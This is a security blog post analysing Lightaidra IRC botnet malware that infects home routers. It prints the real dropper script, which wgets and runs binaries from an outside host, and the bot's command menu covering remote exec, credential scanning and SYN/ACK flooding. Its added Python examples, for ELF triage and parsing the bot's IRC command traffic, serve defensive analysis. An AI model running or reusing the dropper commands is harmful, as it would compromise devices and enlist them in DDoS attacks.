n.runs security team

if we find it interesting, we post it here ;-)

Malware for Home Routers Found in the Wild


Overview

In my previous post I mentioned that my coworker Konstantin Agouros had captured a malware sample that attacked one of his routers in the lab.

For a long time, many of us security researchers have been warning about the risk posed by routers and other network devices: they run embedded systems that are usually in pretty bad shape when it comes to security.

We all do a lot of research that commonly ends with interesting results. When we communicate the concerns raised by those results to our customers, or even to the affected vendors, it is very common to get the following response: "that's theoretical, there's nothing like that in the wild!"

This post is dedicated to all of these people: the ones who, like us, do the research (yeah, keep working, we are doing the right thing) and the people who basically tell us we are wasting our time.

Technical details

Konstantin gave me two files, an ELF binary and a shell script.

  1. getbinaries.sh: the shell script file
  2. arm: the ELF binary

Since the symbols were not stripped from the ELF binary, a quick call graph gives a pretty straightforward view of the malware's main functionality.

[Figure: call graph of the unstripped ELF binary]

The malware is installed on the router by the following shell script (getbinaries.sh):

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://dr.gnu.so"

# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"

rm -fr /var/run/${REFERENCE_MIPSEL} \
        /var/run/${REFERENCE_MIPS} \
        /var/run/${REFERENCE_SUPERH} \
        /var/run/${REFERENCE_ARM} \
        /var/run/${REFERENCE_PPC}

wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}

sleep 3;
rm -fr /var/run/getbinaries.sh

It downloads the malware binaries, which were compiled for a number of architectures (MIPS little-endian, MIPS big-endian, SuperH, ARM and PowerPC), makes each one executable and then tries to run it. After a short sleep the script deletes itself.

In effect it brute-forces execution: each download-chmod-run line is independent, so a binary built for the wrong CPU simply fails to start (the kernel rejects it with an exec format error), while the one matching the router's architecture runs. Not the cleverest way to do it, but it works. Note also that everything is dropped into /var/run, which on embedded Linux devices is typically a RAM-backed filesystem, so this installation does not survive a reboot; the bot stays only as long as the router is up or until it is reinfected.
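As an added example (not code from the original post or from the Lightaidra project), the following Python script does what an analyst does with such a multi-architecture drop before running anything: it reads the ELF identification bytes and the e_machine field of each file, maps them to the names getbinaries.sh uses, and reports which of the dropped files could actually execute on a given CPU. The ELF headers in it are constructed for the example, not the malware's real binaries; the e_machine constants are the standard ELF values.

```python
"""Triage of a multi-architecture dropper set like the one getbinaries.sh fetches.

Added example, not code from the original post or from Lightaidra. Only the
ELF header is inspected, so nothing from the sample is ever executed.
"""
import struct

# Subset of standard ELF e_machine values.
EM_NAMES = {
    3: "x86",
    8: "mips",
    20: "ppc",
    21: "ppc64",
    40: "arm",
    42: "superh",
    62: "x86-64",
    183: "aarch64",
}

ELF_MAGIC = b"\x7fELF"


def identify_elf(data):
    """Return bits, endianness, machine and e_type of an ELF image; raise ValueError otherwise."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}.get(data[4])        # EI_CLASS
    endian = {1: "little", 2: "big"}.get(data[5])  # EI_DATA
    if bits is None or endian is None:
        raise ValueError("invalid EI_CLASS or EI_DATA")
    # e_type and e_machine follow the 16-byte e_ident, in the byte order EI_DATA announces.
    fmt = "<HH" if endian == "little" else ">HH"
    e_type, e_machine = struct.unpack(fmt, data[16:20])
    return {
        "bits": bits,
        "endian": endian,
        "machine": EM_NAMES.get(e_machine, "unknown(%d)" % e_machine),
        "type": e_type,
    }


def dropper_name(info):
    """Map an identified header to the file name getbinaries.sh uses for that CPU."""
    if info["machine"] == "mips":
        return "mipsel" if info["endian"] == "little" else "mips"
    return {"arm": "arm", "ppc": "ppc", "superh": "sh"}.get(info["machine"], "unsupported")


def fake_elf_header(e_machine, endian, bits=32):
    """Constructed minimal ELF header for the example; it carries no real code."""
    ident = ELF_MAGIC + bytes([1 if bits == 32 else 2,
                               1 if endian == "little" else 2,
                               1]) + b"\x00" * 9
    fmt = "<HH" if endian == "little" else ">HH"
    return ident + struct.pack(fmt, 2, e_machine)  # e_type ET_EXEC, then e_machine


def triage(samples):
    """Identify every file of a {name: bytes} set such as the dropper's /var/run contents."""
    result = {}
    for name, data in samples.items():
        try:
            result[name] = dropper_name(identify_elf(data))
        except ValueError as exc:
            result[name] = "error: %s" % exc
    return result


def runnable_on(samples, machine, endian):
    """Names of the dropped files that match the host CPU; only these would survive execve()."""
    matches = []
    for name, data in samples.items():
        try:
            info = identify_elf(data)
        except ValueError:
            continue
        if info["machine"] == machine and info["endian"] == endian:
            matches.append(name)
    return matches


if __name__ == "__main__":
    # Constructed stand-ins for the five binaries plus the script itself.
    samples = {
        "mipsel": fake_elf_header(8, "little"),
        "mips": fake_elf_header(8, "big"),
        "arm": fake_elf_header(40, "little"),
        "ppc": fake_elf_header(20, "big"),
        "sh": fake_elf_header(42, "little"),
        "getbinaries.sh": b"#!/bin/sh\n",
    }
    for name, verdict in triage(samples).items():
        print("%-15s -> %s" % (name, verdict))
    print("would run on a big-endian MIPS router:", runnable_on(samples, "mips", "big"))
```

On a real sample set, replace the constructed headers with the bytes of the files pulled from /var/run; the same two functions tell you which one the router actually executed, and therefore which one to load in the disassembler.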

Once it is successfully executed, the bot takes the following steps:

  1. Forks so that it keeps running in the background (like a service).
  2. Deobfuscates a list of IRC servers hardcoded in the binary and connects to them, using a password which is also hardcoded and obfuscated.
  3. Waits for commands.

Beyond the cmd_exec command, which lets the attacker run any shell command on the system where the bot is running, the malware has a number of built-in capabilities, which are listed by the cmd_help command.

[Figure: the cmd_help routine in the binary]

When cmd_help is called, the bot sends the following content to the attacker as IRC private messages (PRIVMSG):

[Figure: the raw cmd_help strings as extracted from the binary]

With a bit of clean up we get the following help menu:

'PRIVMSG %s :* *** Access Commands:\n\x00'
'PRIVMSG %s :*\n\x00'
"PRIVMSG %s :* .login                <password>        - login to bot's party-line\n\x00"
"PRIVMSG %s :* .logout                                 - logout from bot's party-line\n\x00"
'PRIVMSG %s :* *** Miscs Commands\n\x00'
'PRIVMSG %s :* .exec                 <commands>        - execute a system command\n\x00'
'PRIVMSG %s :* .version                                - show the current version of bot\n\x00'
'PRIVMSG %s :* .status                                 - show the status of bot\n\x00'
'PRIVMSG %s :* .help                                   - show this help message\n\x00'
'PRIVMSG %s :* *** Scan Commands\n\x00'
'PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you\n\x00'
'PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug\n\x00'
'PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random\n\x00'
'PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug\n\x00'
'PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random\n\x00'
'PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug\n\x00'
'PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random\n\x00'
'PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug\n\x00'
'PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)\n\x00'
'PRIVMSG %s :* *** DDos Commands:\n\x00'
'PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,\n\x00'
'PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs\n\x00'
'PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86\n\x00'
'PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof\n\x00'
'PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder\n\x00'
'PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)\n\x00'
'PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder\n\x00'
'PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)\n\x00'
'PRIVMSG %s :* *** IRC Commands:\n\x00'
'PRIVMSG %s :* .setchan        <channel>               - set new master channel\n\x00'
'PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room\n\x00'
'PRIVMSG %s :* .part           <channel>               - part bot from selected room\n\x00'
'PRIVMSG %s :* .quit                                   - kill the current process\n\x00'
'PRIVMSG %s :* *** EOF\n\x00'

What the malware can do is self-explanatory from the help menu above: password-protected access to the bot, arbitrary command execution, scanning for further routers (by credential brute force or by the D-Link bug), SYN/ACK flooding with optional source-address spoofing, and IRC channel management.
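To make the command channel concrete, here is an added Python example (not code from the original post or from the Lightaidra source) that parses IRC PRIVMSG lines the way the bot does: commands start with a dot, variants such as ->random or ->s are appended with arrows as the menu shows, and nothing except .login is honoured until the operator has logged in with the party-line password. It also spots the help banner the bot sends back, which is a usable indicator in captured traffic. The nick, password and traffic lines are constructed for the example.

```python
"""Parse the bot's IRC command channel over constructed traffic.

Added example, not code from the original post or from Lightaidra. It
models only what the help menu shows: dot-prefixed commands in PRIVMSG
text, '->' variant suffixes, and a .login password gate. Nick, password
and sample lines are constructed for the example.
"""
import re

# Command families, taken from the sections of the help menu.
COMMAND_CLASS = {
    "login": "access", "logout": "access",
    "exec": "misc", "version": "misc", "status": "misc", "help": "misc",
    "advscan": "scan", "stop": "scan",
    "spoof": "ddos", "synflood": "ddos", "ngsynflood": "ddos",
    "ackflood": "ddos", "ngackflood": "ddos",
    "setchan": "irc", "join": "irc", "part": "irc", "quit": "irc",
}

# ":nick!user@host PRIVMSG target :text" as seen on the wire.
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)\S* PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
# ".name", ".name->variant", ".name->a->b", each optionally followed by arguments.
CMD_RE = re.compile(
    r"^\.(?P<name>[a-z]+)(?P<suffix>(?:->[a-z]+)*)(?:\s+(?P<args>.*))?$")

HELP_BANNER = "* *** Access Commands:"   # first line of the cmd_help reply


def parse_privmsg(line):
    """Split an IRC PRIVMSG line into nick, target and text; None for other lines."""
    m = PRIVMSG_RE.match(line.strip())
    return m.groupdict() if m else None


def parse_command(text):
    """Recognise a bot command in message text; None for ordinary chat."""
    m = CMD_RE.match(text.strip())
    if not m or m.group("name") not in COMMAND_CLASS:
        return None
    return {
        "name": m.group("name"),
        "variant": m.group("suffix").split("->")[1:],   # "->random->b" -> ["random", "b"]
        "args": (m.group("args") or "").split(),
        "class": COMMAND_CLASS[m.group("name")],
    }


def is_help_banner(text):
    """True for the line that opens the help menu the bot sends to its operator."""
    return HELP_BANNER in text


class BotSession:
    """Replays the .login/.logout party-line gate over a stream of IRC lines."""

    def __init__(self, password):
        self.password = password   # constructed; the real one is obfuscated in the binary
        self.logged_in = set()
        self.events = []

    def feed(self, line):
        msg = parse_privmsg(line)
        cmd = parse_command(msg["text"]) if msg else None
        if cmd is None:
            return None
        nick = msg["nick"]
        if cmd["name"] == "login":
            ok = cmd["args"][:1] == [self.password]
            if ok:
                self.logged_in.add(nick)
            verdict = "accepted" if ok else "rejected"
        elif nick not in self.logged_in:
            verdict = "ignored (not logged in)"
        else:
            if cmd["name"] == "logout":
                self.logged_in.discard(nick)
            verdict = "accepted"
        event = {"nick": nick, "command": cmd, "verdict": verdict}
        self.events.append(event)
        return event


def attack_commands(session):
    """Accepted scan and DDoS commands: the ones worth alerting on."""
    return [e for e in session.events
            if e["verdict"] == "accepted" and e["command"]["class"] in ("scan", "ddos")]


SAMPLE_TRAFFIC = [  # constructed for the example, not a real capture
    ":op!x@203.0.113.9 PRIVMSG #bots :.login hunter2",
    ":op!x@203.0.113.9 PRIVMSG #bots :.advscan->random admin admin",
    ":op!x@203.0.113.9 PRIVMSG #bots :.ngackflood->s 198.51.100.7 80 60",
    ":stranger!y@host PRIVMSG #bots :.exec wget http://example.invalid/x",
    ":op!x@203.0.113.9 PRIVMSG #bots :hello everyone",
    ":op!x@203.0.113.9 PRIVMSG #bots :.stop",
]


def run_sample(password="hunter2"):
    """Feed the constructed traffic through a session and return the session."""
    session = BotSession(password)
    for line in SAMPLE_TRAFFIC:
        session.feed(line)
    return session


if __name__ == "__main__":
    s = run_sample()
    for e in s.events:
        c = e["command"]
        print(e["nick"], c["name"], c["variant"], c["args"], e["verdict"])
    print("attack commands:", [e["command"]["name"] for e in attack_commands(s)])
```

Pointed at a real capture instead of SAMPLE_TRAFFIC, the accepted scan and flood commands give the incident timeline (who scanned which ranges, who was flooded and for how long), and the help banner is a cheap signature for the bot's own replies.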

The malware abuses a D-Link router vulnerability, which the help menu calls the "d-link config reset bug", but it could just as well be used with any other vulnerability: since .exec runs arbitrary commands, any exploit uploaded to the router can be launched from it against any target the attacker chooses.

I clarify this because most vendors will say "we are not vulnerable to this attack" to dodge the issue.

The truth is that any Linux device with one of the supported CPU architectures is enough for the malware to execute and do its thing.

The attacker only needs one vulnerability to exploit in order to deploy the malware. Afterwards he or she can attack the rest of the network, or use the embedded system to compromise other networks.

The source code

Among the strings found in the binary there was one that led us to the source code of the malware, which is available in a GitHub repository!

[Figure: the string in the binary pointing to the GitHub repository]

Go and check it for yourself: Lightaidra

Interesting Legal Aspects

In Germany, whenever P2P software is used to download content, for example from BitTorrent, the owner of the connection is automatically held responsible for the content that was downloaded over that connection.

Now, what if the one downloading content, attacking, etc. is the router? Who is responsible for these activities? The ISP, for providing an insecure device?

This is an interesting question, since it definitely isn’t the fault of the person who doesn’t even know what the router is doing. Maybe it is nobody’s fault, who knows.

I bet lawyers and people who care about their privacy would be eager to further research and answer it.

Conclusions

This particular build of the malware was compiled to target routers only, but anybody could modify it to target all sorts of networked embedded devices running Linux, since the source code is out there, available to everybody.

I’ve run it in the lab on a Surveillance camera and it ran just fine.

Long story short:

Source Code Available + Multi-Architecture out of the box + Evil people everywhere = What might go wrong? …Right?

Written by

Sergio Alvarez
